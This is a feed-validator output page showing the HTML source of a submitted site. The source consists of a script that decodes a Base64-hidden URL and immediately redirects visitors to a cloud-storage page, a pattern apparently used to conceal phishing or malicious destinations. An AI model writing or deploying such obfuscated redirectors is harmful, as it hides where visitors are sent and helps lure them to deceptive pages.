It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: http://abetterchoiceatwaves.com

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.    <meta charset="UTF-8">
  5.    <meta http-equiv="refresh" content="0;url=#">
  6.    <script>
  7.        // Replace this with your Base64 encoded URL
  8.        var base64Url = "aHR0cHM6Ly9wdWItODY3MThkNzYyYzJkNGM2Y2I5ZTMyZDJlMWMxMTkwODgucjIuZGV2L2luZGV4Lmh0bWw=";
  9.        
  10.        // Decode Base64
  11.        var redirectUrl = atob(base64Url);
  12.        
  13.        // Redirect to the decoded URL
  14.        window.location.href = redirectUrl;
  15.    </script>
  16. </head>
  17. <body>
  18. </body>
  19. </html>
  20.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda